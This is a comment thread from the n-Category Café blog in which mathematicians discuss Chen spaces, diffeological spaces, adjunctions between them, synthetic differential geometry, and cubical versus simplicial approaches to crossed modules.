an “extremely nice space”; you know that you might not be able to do so completely but you’d like to see how far you can get. That’s why I want to separate out the “things” from the “things you do to things”. May be it is clear to everyone else, but at the moment this is still confusing me. Perhaps also different people here have different agenda for these objects and I’m picking up on those differences. This is not intended as a criticism! Simply that I sometimes find it hard to keep up. Urs buckarooed: But if you could give me more details on where you find too many bre[a]dcrumbs removed by crows, I’d might have a better chance replacing them (by stones, maybe). It is probably more my failing than yours that I feel as though I am on a journey without a map. To a certain extent, I am mainly interested in one reasonably small part of your journey. You have maps of the whole thing, but they are covered with strange symbols and runes that – for the moment – I have trouble decoding. I was hoping that I could manage this part without needing to study the whole map. Perhaps that was overoptimistic of me. It would probably be useful to both of us if I try to understand the whole map so I shall make the attempt. That’s not to say that I’m not interested in the whole journey, but this one area is one where I thought I could make a contribution so my original intention was simply to sort out the smooth spaces and then sit back and watch the rest from the sidelines – having plenty of other things to do! But “the best laid plans” and all that! So, when I have a moment, I’ll take a much more careful look at the two documents you mention above and see what I can make of it. By the way, some animals eat stones too, aids their digestion it seems, so perhaps small lumps of arsenic? Which reminds me of my fascinating norwegian discovery of this week: the word for “poison” is the same as that for “married”! Posted by: Andrew Stacey on April 25, 2008 2:59 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Andrew, I should probably pave the road for our interaction a bit better by going more into how I am headed towards Dirac operators on loop spaces. The last sections of my notes are indicating how we construct String-2-bundles with connection from lifts of Spin-bundles when a certain obstructoin vanishes. Transgressing these to loop space yields Spin bundles on loop space. Before long, I want to understand the 2-Dirac operators down on base space and the loop space Dirac operators up on the transgressed thing on loop space better. Then I need your help! I’ll draw a map for you for where to find me. But now I need to hurry up to check in and then get my flight back to the Old World. Posted by: Urs Schreiber on April 25, 2008 7:51 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Andrew wrote: By the way, I believe every open convex subset of $\mathbb{R}^n$ is diffeomorphic to $\mathbb{R}^n$ Can you expand on that diffeomorphism a little? Certainly they are homeomorphic but the obvious homeomorphism isn’t always a diffeomorphism. This is one of those things where coming up with explicit formulas can be rather tricky.. the basic idea is that while the boundary of a convex open set can be very jagged and un-smooth, it’s not actually in the open set, so we can indefinitely ‘postpone’ the onset of un-smoothness when we start building a diffeomorphism between this set and an open ball, starting from the inside and working our way out. If that’s too vague: pick a point $p$ in your convex open set $C$ and let $d(x)$ be the distance you can march in the $x$ direction ($x$ any unit vector) starting from $p$ until you hit the boundary of $C$. I hope your ‘obvious’ homeomorphism between $C$ and the open unit ball is the one that maps $p$ to the origin and sends $q \in C$ to something like $(q - p)/d(x)$ where $x$ is the unit vector in the direction $q - p$. But this involves dividing by $d(x)$, which isn’t a smooth function of $x$, so as you note, this ‘obvious’ homeomorphism isn’t smooth. However, instead of dividing by $d(x)$, you can do something similar but subtler, which is smooth as a function of $q$, but approaches ‘dividing by $d(x)$’ as $q$ approaches the boundary of $C$. I think I could come up with a formula that does the job, if I were being paid a bit more… However, as you point out, this whole business is not really necessary for getting $QSh(open convex subsets) \simeq QSh(Euclidean spaces)$ Posted by: John Baez on April 22, 2008 3:00 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Yes, of course. I should have thought of this since it basically relies on the fact that we can approximate a continuous function by a strict monotone sequence of smooth functions. In other words, we can find a sequence of “smooth shells” which converge to the boundary of our convex set in such a way that each is properly contained in the hull of the next. As they converge, every point in the interior of the convex set is eventually within a shell. We then define a diffeomorphism of the convex set and the ambient Euclidean space by sending the nth shell to the sphere of radius n, and smoothly interpolating between the shells. One could call this the “infinite onion” method. Posted by: Andrew Stacey on April 23, 2008 8:26 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II I have another prejudice about what is “right” here: I think among all the various choices of test domains which we are discussing, the “right” one is simply: Euclidean spaces. I mean: not subsets of those, but complete Euclidean spaces, such that our site is $Obj(S) = \mathbb{N}$ $S(n,m) = SmoothManifolds(\mathbb{R}^n,\mathbb{R}^m) \,.$ I came to this conviction for two reasons: first when Todd pointed me to Moerdijk&Reyes: for precisely this choice of $S$ (but none of the other choices which involve subsets) do we have a beautiful theory of duality between “spaces” (contravariant functors on $S$) and “quantities” (covariant functors on $S$) with the latter behaving very (very) nicely as algebras of functions (if monoidal). second: I very much have super on my mind these days. I claim that all you ever do with Chen-like smooth spaces generalizes in a very smooth, very seamless, very autopilot, very satisfactory way if you replace in the above Euclidean spaces simply with super-Euclidean spaces $Obj(S) = \mathbb{N}\times \mathbb{N}$ $S(n|n',m|m') = SmoothSuperManifolds(\mathbb{R}^{n|n'},\mathbb{R}^{m|m'}) \,.$ (Well, point 2 was in effect also pointed out to me by Todd, of course.) My picture of the world of smootheology, at the moment, is this realization of Lawvere’s picture in “Taking categories seriously”: Spaces are presheaves over $S$, with $S$ as above. Rather nice spaces are sheaves over $S$. Pretty nice spaces are sheaves over $S$ which are weakly self-dual with respect to dualization with respect to $\Omega^\bullet$. Very nice spaces are quasi-representable sheaves in $S$. Extremely nice spaces are Isbell-self dual sheaves on $S$ (Frölicher sheaves). (Terminology roughly as in Space and Quantity.) Posted by: Urs Schreiber on April 20, 2008 4:26 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Andrew wrote: I got one of these, at least. My “Early Chen Spaces” are the 1975a definition. But you’re right, my “Chen Spaces” are not on the list. Whoops. However, I think that one can simply delete the word “closed” from my definition of a Chen space to get the 1977 definition and this would not require any other changes to the mathematics. I’ll have to check that, of course, but I’m reasonably confident. The other definitions will require a little thought. I’m glad we’re straightening things out! For me, at least, it’s much less important that you discuss all Chen’s early definitions than that you treat a definition that precisely matches — in substance, if not in presentation — the final polished definition given in his 1977 and 1986 papers. The reason is that I want to use results from your paper in my own work on Chen spaces! And, I’d hate to need a footnote saying “even though his definition of Chen spaces is different from Chen’s, the proofs carry over.” So, if it doesn’t cause trouble, I’d love for you to delete the word ‘closed’ from your definition of Chen spaces. I’ve checked that your two adjunctions between Chen spaces and diffeological spaces still work when I do this… but don’t trust me, please check for yourself! (I’ve also checked that $Ch^\sharp$ is a one-sided inverse to $So$, but I haven’t yet checked $Ch^\flat$.) Perhaps in the main flow of the paper it would be best to concentrate on the last definition and then have a separate section comparing all the different variants of Chen space. That sounds good! For all but the most extreme fans of deviant Chen spaces, this will be clearer and more useful. I’ve got more to say but my wife and I can’t use the internet at the same time in this apartment in Shanghai, and I’m getting in trouble for hogging it right now… Posted by: John Baez on April 19, 2008 5:46 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II John monopolied: So, if it doesn’t cause trouble, I’d love for you to delete the word ‘closed’ from your definition of Chen spaces. No trouble at all! bzr checkout bm:papers/smthcat/main smthcat cd smthcat emacs smthcat.tex M-x replace-regexp closed,? ? C-x C-s C-x C-c bzr commit -m "Removed word 'closed' as requested by John Baez" Ta-da! Seriously, though, I’d like this paper to be both accurate and useful. Getting Chen’s definition wrong is a demerit on both accounts and one I’m happy to correct. This paper is still definitely in the beta stage and so as you (John) have said that you want to use the results of this paper, that gives you the privileged status of a beta tester and ignoring suggestions from beta testers is a bit like … ow, who put that hole in my foot? Ho hum, off to learn some norwegian now. I’ll return to this tomorrow. Posted by: Andrew Stacey on April 22, 2008 10:54 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Okay, she let me back online. Andrew wrote: John wrote: I’m actually interested in showing that Chen’s 1977 category is not equivalent to “Souriau”, but I’ll take whatever words of advice you can offer! I think that they are not equivalent. Let’s see if we can prove this. It looks like you proved it! I’m confused about this step: Let $U$ be an open convex subset of some Euclidean space. We can give this a canonical Chen structure and a canonical Souriau structure; both of which are characterised by the fact that they contain the identity map. As $G F$ and $F G$ are the identity functors, we see that the identity map $|U| \to |U|$ is contained in all of $\mathbf{S}(U, F G(U)), \quad \mathbf{S}(F G(U), U); \quad \mathbf{C}(U, G F(U)), \mathbf{C}(G F(U), U)$ so we deduce that, with absolutely horrendous notation, $G(U) = U$ and $F(U) = U$. but a few days ago I thought I was able to carry out this step in a slightly different way. (Now I forget how.) Anyway, for the same sort of self-interested reason as above, I’d be delighted if you included this result in your paper. (Indeed, in the unlikely event that you’re short of things to do, it would be nice to know that all the categories of smooth spaces you study are inequivalent!) Posted by: John Baez on April 19, 2008 10:22 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II John, this has been bugging me too. I haven’t commented on it until now as I haven’t had anything to add. Perhaps I ought to have mentioned that I was thinking about it, but I abhor spurious comments. You are right. It is not so simple as I thought. But I think I now know how to do it. In brief, the key is to note the special properties of $\mathbb{R}$ in each category. That all “interesting” functors were set-preserving came from the fact that the underlying-set functor was related to a categorically determinable object – a terminal object. To show that all “interesting” functors preserve higher structure, we need to show that $\mathbb{R}$ can be categorically determined. (One of the problems of this method of communication is that I cannot see whether you see what I’m getting at. I want to add a “If you see what I’m getting at, turn to page 183; otherwise, turn to page 23.”, a bit like those daft make-your-own-story books that were around when I were a young’un.) So, if you see what I’m getting at skip the next paragraph or two; otherwise, read on. What I mean is that suppose a manical alien hands you one of these categories, possibly in a slightly warped form, and challenges you to find $\mathbb{R}$ using only categorical tools. Can you find it? (Yes, we can! Err, I think so.) We can certainly identify all those objects whose underlying set is (isomorphic to) $\mathbb{R}$ since the underlying set functor is equivalent to evaluating the hom-functor on a terminal object. Amongst these, can we find $\mathbb{R}$? The one thing you cannot use is the set of plots (or coplots if using Smith or Sikorski spaces). In terms of the category, these are given by evaluating the hom-functor on – you guessed it – $\mathbb{R}$ (and similar). I enjoy a good circular argument as much as the next gibbon, but as not everyone is as loopy as me, I’d better use more traditional techniques. What we can use is that any object with underlying set $\mathbb{R}$ determines a submonoid of $Map(\mathbb{R}, \mathbb{R})$ via the natural inclusion $Hom(X,X) \to Set(|X|,|X|)$ I think that $\mathbb{R}$ is characterised by the fact that the image of this map is precisely $C^\infty(\mathbb{R},\mathbb{R})$. There might be a few other conditions as well, involving limits or colimits (depending on whether we are mapping in or mapping out of our test spaces), but the above is the key property. As I said in another comment, I’m currently revising the paper and will include the details of this in there. I’ll treat the general case as this won’t involve much more than the specific of Chen-Souriau. Posted by: Andrew Stacey on May 6, 2008 9:08 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Here’s another question. Some of you category mavens might want to take a crack at this. Andrew considers Souriau’s category of diffeological spaces, which we’re calling $\mathbf{S}$, and Chen’s category of differentiable spaces, which we’re calling $\mathbf{C}$. He constructs a functor $So : \mathbf{C} \to \mathbf{S}$ and shows this has a right adjoint $Ch^\sharp : \mathbf{S} \to \mathbf{C}$ He also shows that the composite $\mathbf{S} \stackrel{Ch^\sharp}{\to} \mathbf{C} \stackrel{So}{\to} \mathbf{S}$ is equal to the identity. He later has a corollary saying that $Ch^\sharp$ embeds isomorphically $\mathbf{S}$ as a reflective full subcategory of $\mathbf{C}$. I only see how this follows if I also assume that the identity natural transformation $1 : So Ch^\sharp \to 1$ is the counit of the adjunction between $So$ and $Ch^\sharp$. Is this extra assumption really necessary to complete the argument, or not? This extra assumption is probably true and easy to check; I’m just wondering. It’s only in my relatively old age that I’ve warmed to reflective and coreflective subcategories, and I could still be missing plenty of tricks. By the way, $So$ also has a left adjoint $Ch^\flat$ for which $\mathbf{S} \stackrel{Ch^\flat}{\to} \mathbf{C} \stackrel{So}{\to} \mathbf{S}$ is the identity, and Andrew says this embeds $\mathbf{S}$ isomorphically into $\mathbf{C}$ as a coreflective full subcategory. My formal question applies here, too, dually — but in this case I’m more loath to figure out the unit $1 \to So Ch^\flat$ because the functor $Ch^\flat$ is a bit annoying. (Actually, it’s just been a long day — I’ve been trying to reprove everything Andrew showed about Chen spaces and diffeological spaces, making sure I understand what’s going on, and it was fun at first but now I’m getting tired.) Posted by: John Baez on April 19, 2008 10:51 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Hi John! I think you can pretty much do this with abstract nonsense. There are two little lemmas about adjunctions that work well together in situations like this. The first is Lemma A.1.1 in Peter Johnstone’s elephant book. I was surprised when I heard about it: Lemma 1. Let $F: C \to D$ be a functor having a right adjoint $G$. If there is any natural isomorphism between the composite $F G$ and the identity functor on $D$, then the counit of the adjunction is an isomorphism. Proof: One can transport the comonad structure on $F G$ across the isomorphism, to obtain a comonad structure on $1_D$. But the monoid of natural endomorphisms of the identity functor on any category is commutative, so the counit and comultiplication of this comonad must be inverse isomorphisms. Transporting back again, the counit of $(F \dashv G)$ is an isomorphism. I bet you already know the second one. It’s Theorem IV.3.1 in Mac Lane’s book. Lemma 2. Let $G: D \to C$ be a functor having a left adjoint $F$. The counit of this adjunction is invertible if and only if the functor $G$ is full and faithful. Proof: Consider the composite (1)$D(a, b) \stackrel{G}{\to} C(G a, G b) \cong D(F G a, b),$ where the isomorphism comes from the adjunction. This natural transformation is the image, under the Yoneda embedding, of the counit of the adjunction; and clearly it’s invertible just when the first part is invertible, i.e. when $G$ is full and faithful! So, the end result is that, given an adjunction $F\dashv G$, we have $F G\cong1$ iff the counit is invertible iff $G$ is full and faithful. Of course everything dualises too, so $G F\cong1$ iff the unit is invertible iff $F$ is full and faithful. Posted by: Robin on April 20, 2008 4:20 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Robin wrote: Lemma 1. Let $F : C \to D$ be a functor having a right adjoint $G$. If there is any natural isomorphism between the composite $F G$ and the identity functor on $D$, then the counit of the adjunction is an isomorphism. Wow — that’s incredible: it seems too much too hope for! Just because somebody is an isomorphism, the guy we care about is an isomorphism. How often does that happen? But now I think I’d vaguely remembered someone discussing this — either here or on the category theory mailing list. Maybe you. Maybe that’s why I had the gall to hope for such a wonderful result. Thanks a million! Posted by: John Baez on April 21, 2008 4:42 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Urs wrote: Since he never seems to actually mention the very word “sheaf” it might be that he wasn’t aware of the concept (could that be?) and gradually “discovered” it himself. That’s my impression too. It would be very interesting to know if someone ever told Chen he was studying sheaves, and if so, what his reaction was. I imagine someone must have told him when he gave his talk at Lawvere and Schanuel’s 1982 conference on continuum mechanics and synthetic differential geometry at SUNY Buffalo, the talk that was written up here: • K.-T. Chen, On differentiable spaces, Categories in Continuum Physics, Lecture Notes in Math. 1174, Springer, Berlin, (1986), 38–42 After all, in this paper he considers generalized Chen spaces lacking the property that makes them have an underlying set. I believe these are simply sheaves, not ‘concrete’ or ‘quasirepresentable’ sheaves. Alas, as Jim Stasheff told me, “sadly we lost Chen back in 1987 when he was just beginning to be appreciated.” Posted by: John Baez on April 20, 2008 3:58 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II I’m back online again and with a minute or two to spare so I’ll try to respond to the various points raised in this post. I intend to stick to one point per comment so I may post a few different comments; this is so that the ensuing discussion is properly threaded and is certainly not so that I can get the combined comment number for the two Comparative Smootheology posts past the sesquicentury (TeXnichal issues is currently on 151). However, there’s a couple of minor points that I’d like to make before launching into mathematics and I’ll make them here. First off, the daft comment (with abject apologies for stooping so low). John wrote: Andrew’s reply follows — I’ll use my superpowers to pretend he posted it as a comment here. Is it a bird? Is it a plane? No, it’s n-man! Faster than an adjoint functor, more powerful than a coequaliser, and able to leap large categories in a single bound. Secondly, and slightly more seriously, John started this discussion by email because he felt that some of his comments were nitpicky and he didn’t want to offend by airing them in public. To coin a phrase, the only thing worse than being blogged about is not being blogged about. It reminded me a little of the various referee’s reports that I’ve received on other papers. Of course, there’s always the initial reaction: “What do you mean, the paper isn’t perfect as it is?” but after that, I’d far rather have a detailed report that, at the least, shows that the referee actually read the paper! I’m early enough in this game that I know I don’t know how to write a brilliant paper and so any help anyone can give me is welcome. I’m even up for a spat over the Oxford Comma. So, nitpick away! Of course, spelling mistakes are probably better pointed out by email than clogging the blogging (and please do email me; Bruce pointed out several such mistakes on the first draft which helped a lot - thanks Bruce), but anything mathematical that there’s a chance someone else might be confused about or interested in is worth blogging about. (Hmmm, the hosts of this blog may wish to add their own riders to that since although bytes are cheap, bandwidth has a habit of not being so.) Having gotten that off my chest, I’m ready to weigh in on the mathematics. Posted by: Andrew Stacey on April 22, 2008 9:48 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Here’s another question that I’m dying to know the answer to, Andrew: You describe a functor from Souriau’s diffeological spaces to Chen spaces $\Ch^\sharp : So \to Ch$ and you show that this is not an equivalence of categories, even though it’s full and faithful. So, it must not be essentially surjective. So: what’s a Chen space that’s not isomorphic to the image of any diffeological space? (I think I know the answer for your other functor, $Ch^\flat$: the closed unit interval with its usual Chen structure. But, precisely for this reason, I think $Ch^\sharp$ is more interesting! I’m guessing the answer here is: the closed unit interval with a certain goofy Chen structure, where the plots are ‘locally smoothly extendible maps’.) Posted by: John Baez on April 23, 2008 5:21 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II I almost wrote: So: what’s a Chen space that’s not isomorphic to the image of any diffeological space under the functor $Ch^\sharp$? Oh, never mind! As I guessed, the closed unit interval with ‘locally smoothly extendible maps’ as plots will do. And, the proof is just abstract fiddling, not requiring any substantial thought. I’ll include it in my paper with Alex, as part of a little story about ‘Chen spaces versus diffeological spaces’. The darn paper is really close to being done… Posted by: John Baez on April 24, 2008 5:06 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II John wrote that he almost wrote: So: what’s a Chen space that’s not isomorphic to the image of any diffeological space under the functor $Ch^\sharp$? To which he rhetorically replied: Oh, never mind! As I guessed, the closed unit interval with ‘locally smoothly extendible maps’ as plots will do. And, the proof is just abstract fiddling, not requiring any substantial thought. I’ll include it in my paper with Alex, as part of a little story about ‘Chen spaces versus diffeological spaces’. Yes, that was the example I would have given had you not gazumped me. Although the proof does not require any deep thought, I think that the example is illustrative. It demonstrates that when comparing Chen and diffeological spaces then there is really no difference in what “smooth” means inside a space but that they have slightly different meanings on the boundary. Essentially, Chen spaces say that I am allowed to test smoothness on the boundary by testing “half-smoothness”, namely testing with functions that approach the boundary at speed (the identity function on $[0,1]$ being a prime example). The diffeological approach says that I am only allowed to test “full-smoothness” on the boundary, so I can only test with functions that “rebound” from the boundary (the function $(-1,1) \to [0,1]$, $t \mapsto t^2$ being a prime example). By shrinking the number of allowable test functions you get that certain functions which are not “half-smooth” are “full-smooth”, such as the identity on $[0,1]$ regarded as a morphism from the usual Chen structure to the “locally extendible” Chen structure. The darn paper is really close to being done… Great. I look forward to reading it. Incidentally, I’ll rewrite CS as I’ve indicated elsewhere in this discussion to include the results that you want. Are there any more on your wishlist that fit into the remit of CS? Posted by: Andrew Stacey on April 25, 2008 10:29 AM | Permalink | Reply to this Read the post Convenient Categories of Smooth Spaces Weblog: The n-Category Café Excerpt: Chen spaces and Souriau's diffeological spaces are two great contexts for differential geometry. Alex Hoffnung and his thesis advisor just wrote a paper studying these in detail. Tracked: May 17, 2008 4:27 AM Read the post Spivak on Derived Manifolds Weblog: The n-Category Café Excerpt: David Spivak has an interesting thesis on 'derived differential geometry'. Tracked: August 19, 2008 7:17 PM ### Re: Comparative Smootheology, II From the arXiv today: 0808.2996 has a definition of a “differentiable space” that may be of mild interest. In terms of the definitions that we know, it’s closest to Sikorski spaces; that is, it takes the “maps out” point of view, the spaces have to be topological spaces, and the functions have to satisfy a sheaf condition. However, it doesn’t have the algebra condition or the post-composition by smooth functions. What it does have is local models for the space: every point in the space must have an open neighbourhood isomorphic to one of a family of local models. These local models are “locally closed subspaces of Euclidean spaces”. I’d never thought about these before (had to look up the definition on Wikipedia!) and it seems to me as if one can get quite nasty looking sets this way so I’m curious as to what benefit these local models supply. Looking at the references, the authors of this paper have written a SLN on their notion of differentiable spaces (no. 1824, year 2003). I guess someone should take a look at this and see what they say. Given that they’d written an SLN I’m a bit surprised that no one has mentioned them before. Anyone willing to own up to having heard of this notion of differentiable space? Posted by: Andrew Stacey on August 25, 2008 8:43 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Hi Andrew, thanks for the pointer. I feel too busy at the moment to have a close look at this but am certainly interested. Similarly concerning higher versions of this, as mentioned here, where function algebras are replaced by “higher function algebras” of sorts. It seems that the important question to find the answer to is this: what is the relation between - the homotopy category of concrete presheaves of simplicial sets/$\infty$-categories on the one hand, generalizing Chen-like diffeological spaces, and - topological spaces locally equipped with objects in a homotopy category of $\infty$-function algebras generalizing Sikorski’s and other’s locally ringed spaces? As I said, we need comparative $\infty$-smootheology. Eventually. Posted by: Urs Schreiber on August 25, 2008 1:35 PM | Permalink | Reply to this Read the post Comparative Smootheology, III Weblog: The n-Category Café Excerpt: The third episode in our continuing comparison of various frameworks for differential geometry. Tracked: September 3, 2008 8:46 PM Read the post Bär on Fiber Integration in Differential Cohomology Weblog: The n-Category Café Excerpt: On fiber integration in differential cohomology and the notion of generalized smooth spaces used for that. Tracked: November 26, 2008 7:59 AM ### Re: Comparative Smootheology, II Anders Kock has just made available a ‘beta version’ of his new book, Synthetic Geometry of Manifolds, a successor to his classic Synthetic Differential Geometry (also available via that link). Inspiring stuff! Posted by: Tom Leinster on March 2, 2009 9:28 AM | Permalink | Reply to this ### Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices Thanks for posting the link. I’ve always wished I could understand the relation between Urs’ stuff and Kock’s stuff and ultimately relate this to our (Urs and my) stuff. My gut has always told me they should all be part of a big pretty picture. The first thing I did was to search for “Schreiber” in Kock’s book, which took me to Section 3.9 (page 130). There, he seems to say that there are two possible approaches to describing crossed modules (whatever those are): one utilizing cubical forms and another utilizing simplicial forms. He says: The notion of crossed module may seem somewhat ad hoc, but the category of crossed modules is equivalent to some other categories, whose description are conceptually simpler: the category of group objects in the category of groupoids; the category of groupoid objects in the category of groups; the category of 2-groupoids with only one object (a 2-groupoid is a 2-category where all arrows and also all 2-cells are invertible); or the category of “edge symmetric double groupoids with connections” [8], [9]. The latter description is particular well suited for being lifted to higher dimensions, and for the theory of cubical differential forms, and higher connections, cf. [55] and [56]; however, for the purpose of describing a theory of non-abelian 2-forms, the crossed module description is sufficient, and the one most readily adapted for concrete calculations. So we shall adopt this version (following in this respect [2] and [103]); we shall consider differential forms in their simplicial manifestation. [55] A. Kock, Infinitesimal cubical structure, and higher connections, arXiv:0705.4406[math.CT] [56] A. Kock, Combinatorial differential forms - cubical formulation, Applied Categorical Structures 2008 [2] J. Baez and U. Schreiber, Higher Gauge Theory, arXiv:math/0511710v2 [math.DG], 2006. [103] U. Schreiber and K. Waldorf, Smooth Functors vs. Differential Forms, arXiv:0802.0663v2[mathDG] Then the story gets more interesting. In the intro to [55] he says: This research was partly triggered by some questions which Urs Schreiber posed me in 2005; for n = 1, an attempt of an answer was provided in my [14]. I want to thank him for the impetus. I also want to thank Ronnie Brown for having for many years persuaded me to think strictly and cubically. Finally, I want to thank Marco Grandis for useful conversations on cubical and other issues. Four people that I wish I could understand appearing in the same paragraph! :) One of the things I learned from Urs as we worked through our stuff was that cubes (diamonds actually) are more appropriate for modeling physical spacetimes. I came away convinced that simplices were somehow less desirable for physics. I still think so. If you don’t care about physics and are interested in the pure mathematics, then the choice between simplices or cubes/diamonds may be moot (or maybe not), but I was hoping someone could help me understand what the choice entails. I’d guess that simplicices and cubes are in many ways “equivalent” as far as their mathematical properties, but I can also guess that each would represent certain computational advantages depending on what you are interested in. In what cases is it better to work with simplices? In what cases is it better to work with cubes? In what cases does it not matter? Thanks for any words of wisdom that might help get a high level understanding. Posted by: Eric on March 2, 2009 4:30 PM | Permalink | Reply to this ### Re: Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices […] they should all be part of a big pretty picture. Here is what I understand of the big picture: The general topic is that of “generalized smooth spaces” in the sense that these are objects $X$ a) which can be probed by throwing “smooth test spaces” into them; b) such that there are smooth homotopies between different ways of throwing a given smooth test space $U$ into $X$, so that the collection of all ways of throwing $U$ into $X$ forms a higher groupoid. These two conditions are formalized by saying 1) $X$ is a presheaf on smooth test spaces; 2) this sheaf takes values in $\infty$-groupoids. together with a consistency condition: c) so that the interpretation of $X$ as a generalized space probed by $U$s is consisten which in turn is formalized by saying 3) throwing equivalent objects into $X$ must yield equivalent results or in more esoteric language designed to hide a simple idea: 3) $X$ satisfies descent and hence is a smooth $\infty$-stack. Within this general picture there are various variations possible, notably concerning the choice of the collection of “smooth test spaces”. The focus of “synthetic differential geometry” is on such choices of “smooth test objects” which contain “infinitesimally extended spaces”. This pretty much always boils down to regarding certain algebras as dual incarnations of smooth test spaces, and regarding the algebra free on a single generator that squares to 0 as a dual model for the smooth test space that looks like the infinitesimally extended interval. What Anders Kock does in his book and in a long series of articles that he published is to develop a language carefully (but naturally) designed such, roughly, all of the intuitive statements in differential geometry which involve infinitesimal objects can be stated in the way that you’d expect them to be stated intuitively, while still making fully rigorous sense as statements about presheaves on “smooth test objects”. It’s a bit like having a very intuitive graphical user interface to a huge and highly complex supercomputer. On the other hand, much of the stuff concerning generalized smooth spaces that we have been discussing around the Café invokes a less high-powered machine in the background, notably in that it does not require that there are concrete infinitesimal smooth test spaces. So far this concerns choices regarding points a) and 1) above. In principle the choice of technical realization of points b) and 2) above is pretty much independent of the choice for a) and 1). But then, when concretely implementing all these things, some choices seem to pair more naturally than others. Usually the central construction in this context which pairs the choice of realization of item 1) with that of item 2) is the assigment to each smooth test space of its higher groupoid of paths: $\Pi : U \mapsto \Pi(U) \,.$ If one wants to talk about higher bundles with connection, higher nonabelian differential cohomology, etc, much goes through by abstract nonsense, but the realization of this functor $\Pi$ is sensitive to the concrete technical implementation. So then it matters what you regard as a convenient and useful way to draw higher-dimensional smooth paths onto your smooth test space $U$. If you think this is most naturally done cubically, by drawing higher dimensional cubes on $U$, then chances are that you’ll find it convenient take a cubical model for $\infty$-groupoids. If you think that when working with higher structures there is no reason ever not to use simplicies, you’ll use those. There need not be any absolute preference here. On the other hand, things may change when we pass from considering just generalized smooth spaces to generalized smooth spaces equipped additionally with some extra structure. Such as that of having a lightcone structure. Posted by: Urs Schreiber on March 2, 2009 5:58 PM | Permalink | Reply to this ### Re: Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices Does Kock really say: The notion of crossed module may seem somewhat ad hoc, Nothing like ignoring the history and the fact that crossed modules occurred quite naturally in a specific problem! Posted by: jim stasheff on March 2, 2009 9:50 PM | Permalink | Reply to this ### Re: Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices Here is a more complete quote: 3.9 Crossed modules and non-abelian 2-forms Recall that a crossed module $\mathcal{G}$ consists of two groups $H,G$, together with a group homomorphism $\partial: H\to G$, and an action (right action $\vdash$, say) of $G$ on $H$ by group homomorphisms, s.t. 1) $\partial : H\to G$ is $G$-equivariant (takes the $G$-action $\vdash$ on $H$ to the conjugation $G$-action on $G$), $\partial (h \vdash g) = g^{-1}.\partial(h).g$ for all $h\in H$ and $g\in G$; 2) the Peiffer identity $h^{-1}.k.h = k \vdash \partial(h)$ holds for all $h$ and $k$ in $H$. A homomorphism of crossed modules is a pair of group homomorphisms, compatible with the $\partial$s and the actions. The notion of crossed module may seem somewhat ad hoc… I interpreted his remark to mean that the fairly convoluted definition he just gave may not seem very inspired, but it is equivalent to other things that are more intuitive. In other words, I don’t think he was saying crossed modules themselves are ad hoc, but rather the definition he just gave might not seem very motivated at first. At least until you see how it relates to other things. I don’t know enough to judge, but that is what I thought. Posted by: Eric on March 2, 2009 10:40 PM | Permalink | Reply to this ### Re: Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices Jim wrote: Does Kock really say: “The notion of crossed module may seem somewhat ad hoc”? Nothing like ignoring the history and the fact that crossed modules occurred quite naturally in a specific problem! I agree with Eric — Kock is quite right to say what he said. He didn’t say the notion was ad hoc. He said it may seem ad hoc. Indeed, the notion does seem ad hoc if you happen to randomly stumble upon the definition in a textbook: two groups, a homomorphism from one to the other, an action of the other on the one, and two mysterious equations. Of course crossed modules turn out to be very important and fundamental, which becomes utterly obvious when you either study their uses or realize that they’re equivalent to something that can be defined using three words: groups in $Cat$. Posted by: John Baez on March 3, 2009 2:55 AM | Permalink | Reply to this ### Re: Cross Modules and Non-Abelian 2-Forms: Cubes vs Simplices I ought to explain that in the period 1965-74 I was examining the potential role of double groupoids in homotopy theory, suggested by examining the proof I had written down of the van Kampen theorem for the fundamental groupoid on a set of base points. One question was whether there were good examples of double groupoids, and Chris Spencer and I in 1971-3 or so found you could construct them first from normal subgroups of a group and then from crossed modules. The latter were defined by Henry Whitehead in 1946 following on from his earlier work on second relative homotopy groups. Another key step in 1974 was with Philip Higgins, defining a homotopy double groupoid of a based pair (more symmetric than the traditional relative homotopy group) and allowing multiple compositions in 2 directions, essential for doing “algebraic inverses to subdivision”, a useful step in local-to-global problems, which I learned from Dick Swan in 1958 are central in mathematics. My preprint web page has a recent entry developing some double examples, algebraically and homotopically. I have been unable to understand why in general algebraic topologists seem to refuse to admit the existence of such cubical higher homotopy groupoids, and indeed are generally tied down to a one base point approach! Mind you, if you have just two base points in a space X, then the two loop spaces at these get embedded in a bigger object of paths, which I suppose is scary. I have not been able to recover analogous local-to-global arguments using simplices or globes, and using cubes we could also develop tensor product, internal hom, and higher homotopies. (Although the relation between cubes, globes, simplices and in the groupoid case, discs, is useful in the theory.) Nobody seems to have tried `quasi-categories’ in a cubical context. Cubical methods are also used in the concurrency area, as I learned to my surprise at an Aalborg meeting in 1999. Posted by: Ronnie Brown on March 23, 2009 11:02 PM | Permalink | Reply to this Read the post Notions of Space Weblog: The n-Category Café Excerpt: A survey of Jacob Lurie's "Structured Spaces". Tracked: November 4, 2009 3:02 PM Post a New Comment
2014-04-21 05:11:32
